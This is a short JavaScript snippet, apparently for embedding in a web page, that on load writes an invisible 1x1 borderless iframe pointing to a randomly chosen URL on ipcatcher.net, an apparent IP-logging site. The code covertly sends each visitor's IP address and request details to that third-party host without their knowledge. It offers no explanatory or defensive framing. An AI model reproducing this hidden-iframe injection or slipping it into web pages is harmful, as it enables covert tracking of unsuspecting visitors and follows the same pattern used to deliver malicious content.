<!--
function random_link(){

  var url=new Array()
  url[1]="http://www."
  url[2]="http://www."
  url[3]="http://www."
  url[4]="http://www."
  url[5]="http://"

  var links=new Array()
  links[1]="ipcatcher.net/"
  links[2]="ipcatcher.net/index.php"
  links[3]="ipcatcher.net/index.php"
  links[4]="ipcatcher.net/index.php"
  links[5]="ipcatcher.net/index.php"

  var ry=Math.floor(Math.random()*links.length)

  if (ry==0)
     ry=1
	 document.write("<iframe src='"+url[ry]+links[ry]+"' width='1' height='1' scrolling='no' frameborder='0'></iframe>");
}
  random_link()
//-->
